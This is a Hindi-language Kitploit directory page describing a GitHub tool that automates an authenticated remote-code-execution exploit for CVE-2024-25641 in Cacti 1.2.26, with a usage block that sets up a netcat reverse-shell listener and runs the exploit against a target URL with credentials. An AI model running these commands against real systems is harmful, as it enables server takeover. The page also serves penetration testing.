Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26 — CVE-2024-25641 - RCE स्वचालित एक्सप्लॉइट - Cacti 1.2.26 | Kitploit
उपकरण/GitHubGitHub/leo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubleo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

CVE-2024-25641 - RCE स्वचालित एक्सप्लॉइट - Cacti 1.2.26

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1011 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

CVE-2024-25641 के लिए पूर्णतः स्वचालित एक्सप्लॉइट। जब कोई उपयोगकर्ता प्रमाणित होता है, Cacti संस्करण 1.2.26 एक मनमाना फ़ाइल लेखन भेद्यता के प्रति संवेदनशील है, जिसका शोषण "Package Import" सुविधा के माध्यम से किया जा सकता है, यह "Import Templates" अनुमति वाले प्रमाणित उपयोगकर्ताओं को वेब सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देता है (RCE)।

इस PoC का श्रेय : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (मैंने इसे केवल प्रवेश पाने के लिए स्वचालित किया है।)

अस्वीकरण

यह टूल केवल शैक्षिक और परीक्षण उद्देश्यों के लिए है। इस टूल का लेखक इसके साथ किए गए किसी भी दुरुपयोग या अवैध गतिविधियों के लिए ज़िम्मेदार नहीं है। इस टूल का उपयोग केवल उन सिस्टमों पर करें जिनके मालिक आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है।

उपयोग का उदाहरण

root@kitploit:~
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>

# Setup netcat listener
nc -lvnp <LOCAL_PORT>

# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>

आप यह भी देख सकते हैं: CVE-2024-25641 PoC

टूल डाउनलोड करें